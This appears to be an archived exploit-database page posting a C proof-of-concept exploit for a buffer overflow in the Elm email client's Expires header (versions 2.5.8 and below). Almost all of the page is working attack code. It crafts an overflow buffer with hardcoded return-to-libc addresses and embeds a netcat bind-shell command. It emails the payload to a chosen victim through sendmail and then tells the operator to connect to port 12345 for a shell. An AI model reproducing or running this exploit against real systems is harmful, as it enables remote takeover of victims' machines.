exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

elmexPoC.c

elmexPoC.c
Posted Aug 24, 2005
Authored by c0ntex

Proof of concept exploit for Elm versions 2.5.8 and below that makes use of a buffer overflow during the parsing of the Expires field.

tags | exploit, overflow, proof of concept
SHA-256 | 7d429b07d470bef21a26afbf52a3adc8652582d94c91f0bcd8762925ec57fc01

elmexPoC.c

Change Mirror Download
/*

Exploit code for the bug posted by Ulf Harnhammar (metaurtelia.com)
http://archives.neohapsis.com/archives/fulldisclosure/2005-08/0688.html

Probably you will need to change SYSLOC and STRLOC to work on your box

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BUFFER 83
#define EMAIL "tmpmail"
#define STRING "`nc -l -p 12345 -e /bin/sh`&##"
#define SYSLOC 0x42041e50
#define STRLOC 0x4001a207
#define EXTLOC 0x4202b0f0

char expire[]="\x45\x78\x70\x69\x72\x65\x73\x3A\x20";

int main(int argc, char **argv)
{
char buffer[BUFFER];
char *email = NULL;
char *user = NULL;
int i;
long extloc, sysloc, strloc;
FILE *fp;

if(argc != 2) {
puts("Usage: ./elmex <user@where.com>");
exit(EXIT_FAILURE);
}

if(strlen(argv[1]) > 50) {
puts("[-] Sorry, email address too long!");
exit(EXIT_FAILURE);
}

user = (char *)malloc(strlen(argv[1]));
if(!user) {
perror("malloc");
exit(EXIT_FAILURE);
}

email = EMAIL;

memset(user, '\0', strlen(argv[1]));
memcpy(user, argv[1], strlen(argv[1]));

puts("\nExploit for elm email client < 2.5.8 overflow in Expires field");
puts("Tested: Redhat on quiet a Sunday by c0ntex[at]open-security.org\n");

extloc = EXTLOC;
sysloc = SYSLOC;
strloc = STRLOC;

memset(buffer, '\0', BUFFER);
memcpy(buffer, expire, strlen(expire));

for(i = strlen(expire); i < 53; i++)
*(buffer+i) = 0x41;
for(i = 53; i < 57; i += 4)
*(long *)&buffer[i] = sysloc;
for(i = 57; i < 61; i++)
*(long *)&buffer[i] = extloc;
for(i = 61; i < 65; i += 4)
*(long *)&buffer[i] = strloc;

memcpy(&buffer[65], STRING, strlen(STRING));
buffer[BUFFER] = '\0';

puts("[-] Adding exploit buffer to email");

fp = fopen(email, "w");
if(!fp) {
perror("fopen"); free(user);
exit(EXIT_FAILURE);
}

fprintf(fp,
"From: User c0ntex <c0ntex@open-security.org> Sun Aug
21 13:37:00 2005\n"
"Return-Path: <c0ntex@localhost\n"
"Date: Sun, 21 Aug 2005 13:37:00 %s\n"
"Subject: Insecure?\n"
"To: %s\n"
"%s\n", STRING, user, buffer);
fclose(fp);

printf("[-] Emailing %s with malicious content\n", argv[1]);

if(system("/bin/cat ./tmpmail | /usr/sbin/sendmail -t") <0) {
perror("system"); free(user);
exit(EXIT_FAILURE);
}

puts("[-] Connect to system on port 12345 to get your shell\n");

if(unlink(EMAIL) <0)
perror("unlink");

free(user);

return EXIT_SUCCESS;
}


--

regards
c0ntex
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close